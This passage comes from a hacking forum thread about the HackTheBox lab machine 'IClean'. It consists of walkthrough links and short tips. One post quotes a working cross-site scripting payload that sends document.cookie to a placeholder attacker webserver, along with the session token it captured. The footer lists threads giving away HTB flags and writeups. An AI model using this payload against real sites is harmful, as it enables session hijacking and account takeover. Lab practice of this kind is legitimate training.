HTB - IClean
by paven - Saturday April 6, 2024 at 03:55 PM
#21
Mine did that too, try to upgrade your shell by using meterpreter.
Reply
#22
No hustle here is a fully detailed walkthrough on how to pwn iClean Medium Linux Machine
https://medium.com/@Null0X0/iclean-hackt...eab6312558
Reply
#23
(Apr 08, 2024, 10:12 AM)slxshxtx Wrote: Try with this payload -->

service=<img src=x onerror=this.src="http://YOUR-WEBSERVER-IP:YOUR-WEBSERVER-PORT/cookie.php?c="+document.cookie;>
URL ENCODE IT

it returns session in cleartext:

"GET /cookie.php?c=session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhLNew.4U0O4zKiKVJkXLWSwqYZkwUMepo HTTP/1.1" 404 -

Does anyone know if there is any reason why the first poster in this thread used btoa() to base64 encode the document.cookie instead of accessing it directly?
It seemed to work both ways for me.
Reply
#24
How we can find the qr_link parameter from qrgenerator endpoint?
Reply
#25
(Apr 10, 2024, 05:54 AM)ghostess256 Wrote: No hustle here is a fully detailed walkthrough on how to pwn iClean Medium Linux Machine
https://medium.com/@Null0X0/iclean-hackt...eab6312558

This writeup did helped. For the root file, we can directly take the file just like you mentioned and get the contents of root file without going for root ssh.
Reply
#26
Did HTB patched QRgenerator vulnerability ?, I cant seem to access it. Anyone facing the same issue

nevermind accessed it

(Apr 13, 2024, 01:46 PM)cyberpunk123 Wrote: Did HTB patched QRgenerator vulnerability ?, I cant seem to access it. Anyone facing the same issue
Reply
#27
(Apr 13, 2024, 03:09 AM)xbox142 Wrote: How we can find the qr_link parameter from qrgenerator endpoint?

Intercept the request to /QRGenerator with Burp suite and look at the bottom where the data fields are.
Reply
#28
Thank you very much...
Reply
#29
Video walkthrough for IClean https://youtu.be/r0gEQhqK2OA

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
#30
been wondering around for credits
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 603 92,346 5 hours ago
Last Post: 0xnany
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 23 2,724 5 hours ago
Last Post: 0xnany
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 374 93,323 6 hours ago
Last Post: 0xnany
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 8 538 8 hours ago
Last Post: mrmanual
  [FREE] CPTS 12 FLAGS pulsebreaker 70 2,143 9 hours ago
Last Post: neurodot

Forum Jump:


 Users browsing this forum: 1 Guest(s)